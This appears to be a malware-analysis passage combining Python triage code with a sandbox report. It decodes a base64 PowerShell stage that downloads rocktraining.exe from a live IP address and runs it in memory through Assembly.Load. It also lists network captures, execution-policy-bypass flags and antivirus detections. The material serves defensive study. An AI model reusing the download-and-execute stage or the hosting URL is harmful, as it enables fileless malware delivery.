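def decode_stage(cmdline: str) -> str:
    """Return the PowerShell script hidden inside FromBase64String('...')."""
    m = FROM_B64_RE.search(cmdline)
    if m is None:
        raise ValueError("no FromBase64String('...') literal in command line")
    return base64.b64decode(m.group(1)).decode("utf-8")


def extract_iocs(script: str) -> dict:
    """Network indicators and loader markers found in the decoded script."""
    ua = UA_RE.search(script)
    return {
        "urls": URL_RE.findall(script),
        "user_agent": ua.group(1) if ua else None,
        "loader_markers": sorted(k for k, s in LOADER_MARKERS.items() if s in script),
    }


def triage(cmdline: str) -> dict:
    """One record per process-creation event: launcher flags plus, when the
    payload decodes, the decoded stage and its indicators."""
    result = {
        "launcher_markers": sorted(k for k, s in LAUNCHER_MARKERS.items() if s in cmdline),
        "stage": None,
        "iocs": None,
    }
    try:
        stage = decode_stage(cmdline)
    except (ValueError, UnicodeDecodeError, binascii.Error):
        return result  # not this launcher shape, or not valid base64/UTF-8
    result["stage"] = stage
    result["iocs"] = extract_iocs(stage)
    return result


if __name__ == "__main__":
    rec = triage(SANDBOX_CMDLINE)
    print("launcher flags:", ", ".join(rec["launcher_markers"]))
    print("decoded stage:\n" + rec["stage"])
    print("iocs:", rec["iocs"])
```

Running the block prints the five-line stage: a WebClient with a custom User-Agent, DownloadData of http://23.27.46.60/a0001/0228/rocktraining.exe, [Reflection.Assembly]::Load on the bytes, and EntryPoint.Invoke. The User-Agent string in the decoded script is exactly the one the Data sent entry shows on the wire, which is the quickest confirmation that the decode is right. Because the stage is loaded with Assembly.Load from a byte array, rocktraining.exe never has to be written to disk, so file-based detection on the host should not be expected to see it; the process command line and the HTTP request are the durable artefacts.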
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received (response to GET /a0001/0228/rocktraining.exe; the report shows only the first bytes of the body)
HTTP/1.1 200 OK
Date: Mon, 03 Mar 2025 05:47:34 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Fri, 28 Feb 2025 09:52:00 GMT
ETag: "1d7400-62f30c2019678"
Accept-Ranges: bytes
Content-Length: 1930240
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
Body: MZ ... This program cannot be run in DOS mode. ... PE ... sections .text .rsrc .reloc (binary PE content omitted here; the remaining captured fragment is a .NET metadata strings heap, reproduced below as captured)
Data received
Data sent GET /a0001/0228/rocktraining.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.112 Host: 23.27.46.60 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 23.27.46.60
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
Time & API Arguments Status Return Repeated

send

buffer: GET /a0001/0228/rocktraining.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.112 Host: 23.27.46.60 Connection: Keep-Alive
socket: 1260
sent: 182
1 182 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:47:34 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Fri, 28 Feb 2025 09:52:00 GMT ETag: "1d7400-62f30c2019678" Accept-Ranges: bytes Content-Length: 1930240 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
received: 2920
socket: 1260
1 2920 0
option -ep bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Lionic Trojan.Win32.Generic.4!c
MicroWorld-eScan Trojan.GenericKD.75920225
CTX exe.trojan.generic
CAT-QuickHeal Trojan.Ghanarava.1740911495993e3f
Skyhigh BehavesLike.Win64.Downloader.ct
Cylance Unsafe
VIPRE Heur.BZC.MNT.Boxter.928.75BC3D13
CrowdStrike win/malicious_confidence_100% (W)
Symantec Trojan.Gen.MBT
ESET-NOD32 a variant of Generik.FIGRVEL
Paloalto generic.ml
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.75920225
Emsisoft Trojan.GenericKD.75920225 (B)
F-Secure Trojan.TR/AVI.Agent.snbwc
McAfeeD ti!370E0CEDD9A4
Sophos Mal/Generic-S
Ikarus Trojan.Win32.Themida
FireEye Trojan.GenericKD.75920225
Google Detected
Avira TR/AVI.Agent.snbwc
Kingsoft Win32.Troj.Unknown.a
Arcabit Trojan.Generic.D4867361
Microsoft Trojan:Win32/Wacatac.B!ml
Varist W64/ABTrojan.UCSM-7856
AhnLab-V3 Trojan/Win.Malware-gen.C5735873
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.325968088
TrendMicro-HouseCall TrojanSpy.Win64.STRELASTEALER.YXFB2Z
Tencent Win32.Trojan-Downloader.Agent.Fdhl
Fortinet PossibleThreat.MU
Panda Trj/Chgt.AD